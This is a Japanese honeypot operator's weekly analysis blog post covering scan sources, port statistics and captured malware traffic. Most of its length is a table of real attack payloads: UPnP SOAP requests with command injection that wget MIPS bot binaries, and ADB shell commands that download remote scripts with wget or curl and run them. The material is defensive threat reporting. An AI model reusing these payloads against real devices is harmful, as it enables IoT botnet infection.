ハニーポット簡易分析(64-70日目:10/14-10/17)
更新が遅れてしまいましたが、今週中に先週分の分析結果を順次アップしていこうと思います。
ハニーポット簡易分析(64-70日目:10/14-10/17)
<Honeytrap分析結果>
※80ポート宛の通信は除外しています。
10/16での検知数増加は2つのIPによるスキャン行為でした。主に30000番台のポートをスキャンしており、外部でも不審なIPとして報告されていました。
送信元IP | 検知数 | 概要 |
185[.]222[.]209[.]38 | 7,517 | ポート 30000番台へのスキャン |
62[.]76[.]75[.]210 | 3,631 | ポート 30000番台へのスキャン |
185.222.209.38 | Cloud Core LP | AbuseIPDB
62.76.75.210 | OOO Serverland | AbuseIPDB
<宛先ポート別通信>
宛先ポート |
検知数 |
445 | 12030 |
3389 | 336 |
22 | 279 |
1433 | 261 |
8080 | 231 |
81 | 209 |
8545 | 194 |
2222 | 169 |
8022 | 156 |
222 | 152 |
<ポート 8022宛通信>
調査した結果、SSH関連の通信でした。
ペイロード:
SSH-2.0-libssh2_1.7.0..
<マルウェア検知>
特に検知傾向に大きな変化はありませんでした。
宛先ポート | 送信元IP | マルウェアダウンロード | ペイロード | 検知数 |
52869 | 217[.]61[.]3[.]138 | hxxp://76[.]74[.]177[.]230/seraph[.]mips | POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 636..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/seraph.mips -O seraph`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> | 27 |
52869 | 80[.]211[.]44[.]143 | hxxp://107[.]191[.]99[.]230/loli[.]mips | POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 633..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/loli.mips -O loli`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> | 26 |
52869 | 80[.]211[.]103[.]12 | hxxp://107[.]191[.]99[.]230/loli[.]mips | POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 633..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/loli.mips -O loli`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> | 18 |
5555 | 122[.]96[.]234[.]121 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 6 |
5555 | 5[.]27[.]11[.]146 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 4 |
52869 | 162[.]243[.]174[.]240 | hxxp://178[.]62[.]24[.]222/bins/hoho[.]mips | POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 652..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64..Connection: keep-alive..Accept: */*..Accept-Encoding: gzip, deflate.....<?xml version="1.0" ?>.<s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/">.<s:Body>.<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">.<NewRemoteHost></NewRemoteHost>.<NewExternalPort>47450</NewExternalPort>.<NewProtocol>TCP</NewProtocol>.<NewInternalPort>44382</NewInternalPort>.<NewInternalClient>`cd /tmp/; wget hxxp://xxx.xxx.xxx.xxx/bins/hoho.mips -O sp`</NewInternalClient>.<NewEnabled>1</NewEnabled>.<NewPortMappingDescription>syncthing</NewPortMappingDescription>.<NewLeaseDuration>0</NewLeaseDuration>.</u:AddPortMapping>.</s:Body>.</s:Envelope>. | 4 |
5555 | 202[.]62[.]20[.]234 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 2 |
5555 | 101[.]206[.]144[.]219 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 105[.]130[.]167[.]144 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 105[.]152[.]251[.]64 | hxxp://185[.]162[.]130[.]187/adbs2 | CNXN............2.......host::.OPEN............aJ......shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2. | 1 |
5555 | 106[.]18[.]202[.]32 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 111[.]197[.]142[.]125 | hxxp://185[.]162[.]130[.]187/adbs2 | CNXN............2.......host::.OPEN............aJ......shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2. | 1 |
5555 | 112[.]193[.]94[.]196 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 114[.]252[.]221[.]4 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 114[.]254[.]209[.]7 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... | 1 |
5555 | 114[.]35[.]37[.]242 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 117[.]94[.]148[.]81 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... | 1 |
5555 | 122[.]230[.]165[.]152 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 122[.]245[.]30[.]160 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 125[.]109[.]119[.]84 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 168[.]70[.]69[.]84 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 176[.]237[.]14[.]168 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 176[.]237[.]49[.]113 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 176[.]237[.]77[.]30 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 177[.]253[.]35[.]177 | hxxp://185[.]162[.]130[.]187/adbs2 | CNXN............2.......host::.OPEN............aJ......shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2. | 1 |
5555 | 180[.]122[.]19[.]45 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 185[.]48[.]54[.]25 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 187[.]27[.]181[.]112 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 1[.]214[.]183[.]146 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]16[.]121 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]16[.]128 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]16[.]225 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]16[.]229 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]17[.]136 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]17[.]15 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]17[.]207 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]17[.]36 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]17[.]49 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]17[.]84 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]18[.]167 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]18[.]45 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]18[.]94 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]19[.]145 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]19[.]50 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]19[.]62 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]19[.]74 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]19[.]90 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]20[.]169 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]20[.]231 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]20[.]47 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]20[.]89 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]108 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]123 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]138 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]162 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]44 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]60 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]72 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 203[.]218[.]123[.]114 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 218[.]103[.]129[.]81 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 221[.]124[.]105[.]149 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 223[.]10[.]249[.]244 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 223[.]17[.]33[.]158 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 223[.]17[.]71[.]38 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 24[.]47[.]115[.]152 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 27[.]213[.]109[.]36 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 42[.]2[.]175[.]164 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 42[.]98[.]8[.]69 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... | 1 |
5555 | 58[.]153[.]243[.]222 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 58[.]254[.]52[.]232 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 5[.]27[.]138[.]218 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... | 1 |
5555 | 60[.]22[.]177[.]204 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 77[.]217[.]133[.]48 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 78[.]130[.]206[.]137 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 78[.]68[.]59[.]80 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 80[.]178[.]84[.]82 | hxxp://207[.]148[.]78[.]152/bc | CNXN............2.......host::.OPEN............&A......shell:cd /data/local/tmp;wget hxxp://xxx.xxx.xxx.xxx/br -O- >br;sh br;busybox wget hxxp://xxx.xxx.xxx.xxx/r -O- >r;sh r;curl hxxp://xxx.xxx.xxx.xxx/c >c;sh c;busybox curl hxxp://xxx.xxx.xxx.xxx/bc >bc;sh bc;rm -rf bc br r c;. | 1 |
5555 | 82[.]222[.]171[.]202 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 83[.]183[.]62[.]208 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
